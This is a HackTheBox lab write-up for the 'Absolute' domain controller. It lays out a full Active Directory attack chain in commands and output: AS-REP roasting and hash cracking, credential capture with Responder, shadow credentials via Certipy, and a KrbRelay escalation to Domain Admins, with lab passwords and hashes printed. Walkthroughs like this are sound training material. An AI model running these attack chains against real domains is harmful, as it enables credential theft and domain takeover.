Absolute is an Insane Windows machine from HackTheBox created by Geiseric. This machine starts off with discovering usernames in the Author field of metadata from images on the website. Making a wordlist out of these and using kerburte reveals valid usernames. Iβll AS-REP roast these users to get one hit, and the hash from the AS-REP Roast cracks. Every user is in the Protected Users group so we have to get a TGT for all users and go through kerberos with every tool. After some LDAP enumeration I find another users password set in their description. Using that user I can grab an exe file which attempts to authenticate to LDAP at dc.absolute.htb, so I point that FQDN to my attacker machine and I capture the creds via Responder. This user has permissions to grant himself GenericAll to a group that has GenericWrite to a user that can WinRM, so I abuse this via bloodyAD and certipy-ad to get the NT hash of winrm_user, then I WinRM to obtain the user flag. For root some basic enumeration fails, so instead we have to run Krbrelay.exe with RunasCs.exe to obtain an interactive session, and using a custom port with the right clsid, I can add myself to the local Administrators group to read the root flag.
Nmap Scan
Iβll start by running nmap on all open TCP ports:
π« ~/htb/Absolute/enumeration β nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.11.181 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 02:12 EDT Nmap scan report for DC.absolute.htb (10.10.11.181) Host is up (0.10s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Absolute | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-14 06:12:25Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute | Not valid before: 2025-04-23T18:13:50 |_Not valid after: 2026-04-23T18:13:50 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute | Not valid before: 2025-04-23T18:13:50 |_Not valid after: 2026-04-23T18:13:50 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute | Not valid before: 2025-04-23T18:13:50 |_Not valid after: 2026-04-23T18:13:50 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.absolute.htb, DNS:absolute.htb, DNS:absolute | Not valid before: 2025-04-23T18:13:50 |_Not valid after: 2026-04-23T18:13:50 |_ssl-date: 2025-06-14T06:13:16+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.29 seconds
As you can see this is a DC with the domain absolute.htb, and the FQDN dc.absolute.htb. There is a website which is unusual so Iβll check that out first.
Recon
445/tcp - SMB
Iβll test for Guest authentication using nxc:
1 2 3
π« ~/htb/Absolute/enumeration β nxc smb dc.absolute.htb -u Guest -p '' --shares SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) SMB 10.10.11.181 445 DC [-] absolute.htb\Guest: STATUS_ACCOUNT_DISABLED
Guest auth is disabled, Iβll move onto HTTP instead.
80/tcp - HTTP
The site looks like a generic HTTP template running on IIS/10.0:
π« ~/htb/Absolute/enumeration/pictures β ls hero_1.jpg hero_2.jpg hero_3.jpg hero_4.jpg hero_5.jpg hero_6.jpg
Now with this one liner I can get all of the authors:
1 2 3 4 5 6 7
π« ~/htb/Absolute/enumeration/pictures β exiftool * | grep Author | awk -F ': ' '{print $2}' James Roberts Michael Chaffrey Donald Klay Sarah Osvald Jeffer Robinson Nicole Smith
Real authors in image metadata typically donβt seem like this, of course it can be common but I usually see a company or something like that, so this is interesting. The whole goal here is to get valid usernames in AD, and a very common naming convention for usernames in AD is:
1
john doe = j.doe
First letter of first name, and full last name seperated by a period. We could try all naming conventions with username-anarchy, but when I did this machine I went straight for the most common one so hereβs a wordlist I made for that:
/usr/local/bin/GetNPUsers.py:150: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() + datetime.timedelta(days=1) [-] User J.ROBERTS doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User J.ROBINSON doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User L.MOORE doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User N.SMITH doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User S.JOHNSON doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User M.CHAFFREY doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$D.KLAY@ABSOLUTE.HTB:c253d756ee3ef5e6041ea0f7a534e308$21bbfb32228080fff5874e727e2f1ec433ada497f81764a4e810f0a4c2d0a85318ef7057c6f02a8620f9571a9b2d23189f47fadc85f76dd22593a36ea020e39ab50702e6aec5c62a47e39f7a3c15f2ace1d3bdfb35e610892a2a2cdc3863e9ebe5c3c7fcea3d1d6564c2a311b3fe9247a4ede126b4830974137171ca4ae30e4e675af9672f14eb46bb6fd2ed0c42f0559fcbbc5ce36f2daf80c23d0230d2ab82dc5ee9c8cd5788b266869c1c7a8c2ff1ee5b1696c36bcec0550b5a91bb9788be864aeeb4643939f15b8de9033b8fb93628b12cc9b2f9cdb80edba3ef2a761452cf8083589762289a5b356647 [-] User S.OSVALD doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User winrm_user doesn't have UF_DONT_REQUIRE_PREAUTH set
We got a hit for d.klay, Iβll save his hash and crack it via hashcat:
1 2 3 4 5 6 7 8 9 10
π« ~/htb/Absolute/enumeration β hashcat -a 0 d.hash /usr/share/wordlists/rockyou.txt --show Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash:
Valid starting Expires Service principal 06/14/2025 02:27:06 06/14/2025 06:27:06 krbtgt/ABSOLUTE.HTB@ABSOLUTE.HTB renew until 06/14/2025 06:27:06
Nice, now lets try:
1 2 3
π« ~/htb/Absolute/enumeration β nxc smb DC.absolute.htb -u d.klay -k --use-kcache SMB DC.absolute.htb 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) SMB DC.absolute.htb 445 DC [+] ABSOLUTE.HTB\d.klay from ccache
Boom, thats valid authentication as d.klay, Iβll use rusthound with kerberos authentication because its seemingly the only ingestor that wonβt give me trouble:
π« ~/htb/Absolute/enumeration β rusthound --zip -d absolute.htb -u 'd.klay' -k --dns-tcp -f DC.absolute.htb --------------------------------------------------- Initializing RustHound at 02:27:53 on 06/14/25 Powered by g0h4n from OpenCyber ---------------------------------------------------
[2025-06-14T06:27:53Z INFO rusthound] Verbosity level: Info [2025-06-14T06:27:54Z INFO rusthound::ldap] Connected to ABSOLUTE.HTB Active Directory! [2025-06-14T06:27:54Z INFO rusthound::ldap] Starting data collection... [2025-06-14T06:27:55Z INFO rusthound::ldap] All data collected for NamingContext DC=absolute,DC=htb [2025-06-14T06:27:55Z INFO rusthound::json::parser] Starting the LDAP objects parsing... [2025-06-14T06:27:55Z INFO rusthound::json::parser] Parsing LDAP objects finished! [2025-06-14T06:27:55Z INFO rusthound::json::checker] Starting checker to replace some values... [2025-06-14T06:27:55Z INFO rusthound::json::checker] Checking and replacing some values finished! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 18 users parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 63 groups parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 1 computers parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 1 ous parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 1 domains parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 2 gpos parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] 21 containers parsed! [2025-06-14T06:27:55Z INFO rusthound::json::maker] .//20250614022755_absolute-htb_rusthound.zip created!
RustHound Enumeration Completed at 02:27:55 on 06/14/25! Happy Graphing!
Auth as svc_smb
Importing this into bloodhound, I can see that my user is in 3 groups, although none of these give my user Group Delegated permissions.
When this happens, Iβll usually resort to checking user descriptions via --users in nxc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
LDAP DC.absolute.htb 389 DC krbtgt 2022-06-09 04:16:38 0 Key Distribution Center Service Account LDAP DC.absolute.htb 389 DC J.Roberts 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC M.Chaffrey 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC D.Klay 2022-06-09 04:25:51 0 LDAP DC.absolute.htb 389 DC s.osvald 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC j.robinson 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC n.smith 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC m.lovegod 2022-06-09 04:25:51 0 LDAP DC.absolute.htb 389 DC l.moore 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC c.colt 2022-06-09 04:25:51 0 LDAP DC.absolute.htb 389 DC s.johnson 2022-06-09 04:25:51 1 LDAP DC.absolute.htb 389 DC d.lemm 2022-06-09 04:25:51 0 LDAP DC.absolute.htb 389 DC svc_smb 2022-06-09 04:25:51 0 AbsoluteSMBService123! LDAP DC.absolute.htb 389 DC svc_audit 2022-06-09 04:25:51 0 LDAP DC.absolute.htb 389 DC winrm_user 2022-06-09 04:25:51 1 Used to perform simple network tasks
As you can see, we find what looks like a password for svc_smb:
1
LDAP DC.absolute.htb 389 DC svc_smb 2022-06-09 04:25:51 0 AbsoluteSMBService123!
Type help for list of commands # use Shared # ls drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 . drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 .. -rw-rw-rw- 72 Thu Sep 1 13:02:23 2022 compiler.sh -rw-rw-rw- 67584 Thu Sep 1 13:02:23 2022 test.exe
The file compiler.sh shows that the test.exe file was compiled in nim:
1 2 3 4
# cat compiler.sh #!/bin/bash
nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1
Iβll grab test.exe and do some basic checks:
1 2 3 4
π« ~/htb/Absolute/enumeration β file test.exe test.exe: PE32+ executable for MS Windows 5.02 (GUI), x86-64 (stripped to external PDB), 11 sections π« ~/htb/Absolute/enumeration β strings test.exe | grep -iE "cmd|powershell|http|calc|shellcode" _acmdln
Seems like a normal PE32 executable, trying to RE this in dnSpy fails because it canβt decompile it. Instead Iβll run the test.exe file in a Windows 10 VM and see what its doing:
It doesnβt output anything, so Iβll connect to my VPN on the windows machine and sniff the traffic on my tun0 via Wireshark (you may have to add dc.absolute.htb to your hosts file on windows):
Seems like the tool is trying to authenticate to LDAP using m.lovegod, Iβll point the IP for dc.absolute.htb in my hosts file to my kali machineβs IP instead and listen on responder:
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON]
Looks like we have GenericWrite over winrm_user, the easiest way to abuse this is Shadow Credentials, so Iβll do that via Certipy:
1 2 3 4 5 6 7 8 9 10 11 12 13
π« ~/htb/Absolute/enumeration β certipy-ad5 shadow auto -u 'm.lovegod'@absolute.htb -k -account 'winrm_user' -dc-host dc.absolute.htb Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] Target name (-target) not specified and Kerberos authentication is used. This might fail [!] DNS resolution failed: The DNS query name does not exist: dc.absolute.htb. [!] Use -debug to print a stacktrace [*] Targeting user 'winrm_user' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'd2914f2d-312f-2771-2a41-5a5d8c66243c' [*] Adding Key Credential with device ID 'd2914f2d-312f-2771-2a41-5a5d8c66243c' to the Key Credentials for 'winrm_user' [-] Could not update Key Credentials for 'winrm_user' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
I got INSUFF_ACCESS_RIGHTS even though Iβm in the group that has GenericWrite over winrm_user, Iβm not sure why but requesting a new TGT for m.lovegod fixes this issue:
Password: [*] Saving ticket in m.lovegod.ccache π« ~/htb/Absolute/enumeration β export KRB5CCNAME=m.lovegod.ccache π« ~/htb/Absolute/enumeration β certipy-ad5 shadow auto -u 'm.lovegod'@absolute.htb -k -account 'winrm_user' -dc-host dc.absolute.htb Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] Target name (-target) not specified and Kerberos authentication is used. This might fail [!] DNS resolution failed: The DNS query name does not exist: dc.absolute.htb. [!] Use -debug to print a stacktrace [*] Targeting user 'winrm_user' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77' [*] Adding Key Credential with device ID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77' to the Key Credentials for 'winrm_user' [*] Successfully added Key Credential with device ID 'd0bc1900-8b7d-e2c8-1cca-76a0c14c8c77' to the Key Credentials for 'winrm_user' [*] Authenticating as 'winrm_user' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'winrm_user@absolute.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'winrm_user.ccache' [*] Wrote credential cache to 'winrm_user.ccache' [*] Trying to retrieve NT hash for 'winrm_user' [*] Restoring the old Key Credentials for 'winrm_user' [*] Successfully restored the old Key Credentials for 'winrm_user' [*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
After some time, I get the NT hash and TGT for winrm_user! This user can PSRemote to the DC so Iβll set my /etc/krb5.conf to match for absolute.htb:
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\winrm_user\Desktop> net user winrm_user User name winrm_user Full Name Comment Used to perform simple network tasks User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 6/9/2022 1:25:51 AM Password expires Never Password changeable 6/10/2022 1:25:51 AM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 6/13/2025 11:54:33 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users *Protected Users The command completed successfully.
Nope, just the WinRM group. At this part I was stuck so I looked at a writeup. Using KrbRelay, we can relay auth requests through a server back to the DC to have control of whatever we want. This was patched back in October 2022, but this machine doesnβt have the patches for that patch yet:
So the prerequisites for this to work are:
Machine doesnβt have October 2022 Patches
Machine has LDAP signing disabled
To abuse this Iβll drop CheckPort.exe and KrbRelay.exe onto the machine, if you want those pre compiled, you can find them here in my pre compiled tools repo.
Info: Uploading /root/htb/Absolute/enumeration/../../../../../opt/tools/CheckPort.exe to C:\programdata\CheckPort.exe
Data: 10240 bytes of 10240 bytes copied
Info: Upload successful! *Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 7/20/2021 12:21 PM Microsoft d----- 9/2/2022 6:38 PM Package Cache d----- 9/2/2022 4:39 PM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 6/7/2022 6:39 AM ssh d----- 9/15/2018 12:19 AM USOPrivate d----- 7/20/2021 12:22 PM USOShared d----- 7/20/2021 12:27 PM VMware -a---- 6/14/2025 12:07 AM 7680 CheckPort.exe -a---- 6/14/2025 12:06 AM 1618944 KrbRelay.exe
Perfect, now Iβll run CheckPort.exe to see what port we can run the server on:
1 2 3
*Evil-WinRM* PS C:\programdata> .\CheckPort.exe [*] Looking for available ports.. [*] SYSTEM Is allowed through port 10
Cool so weβll go through port 10, Iβll run KrbRelay.exe on port 10 supplying the target SPN (ldap), the server port, and the clsid (you can get the OS version and look through a list of cslidβs to get this):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
*Evil-WinRM* PS C:\programdata> .\KrbRelay.exe -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10 -spn ldap/dc.absolute.htb -add-groupmember "Domain Admins" winrm_user [*] Relaying context: absolute.htb\DC$ [*] Rewriting function table [*] Rewriting PEB [*] GetModuleFileName: System [*] Init com server [*] GetModuleFileName: C:\programdata\KrbRelay.exe [*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAitzXQbopayNJsMLufUYqdArAAAHwI///mMpOF+aRvDCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication [*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 System.Runtime.InteropServices.COMException (0x8000401A): The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A) at KrbRelay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults) at KrbRelay.Program.Main(String[] args)
This error occurs because we donβt have an interactive session, which is because weβre connected via WinRM. So Iβll use RunasCs.exe with a previous user:
1 2
*Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod "AbsoluteLDAP2022!" -d absolute.htb '.\KrbRelay.exe -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10 -spn ldap/dc.absolute.htb -add-groupmember "Domain Admins" winrm_user' [-] RunasCsException: Selected logon type '2' is not granted to the user 'm.lovegod'. Use available logon type '3'.
This user doesnβt have that logon type granted, instead Iβll use type 9 which is NewCredentials:
[*] Relaying context: absolute.htb\DC$ [*] Rewriting function table [*] Rewriting PEB [*] GetModuleFileName: System [*] Init com server [*] GetModuleFileName: C:\programdata\KrbRelay.exe [*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAmpkwFn7+icWAb8BYLRND0AgwAAOgQ///89x+X5qWRLCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\winrm_user\Documents> cd ..\..\Administrator *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Absolute was an awesome machine, although the username enumeration through pictures was kinda hard to find considering the website looked like an ordinary template. But the ACL chains and capturing the LDAP credentials were cool. And the KrbRelay attack was really interesting. Iβd give this machine a solid 8/10!
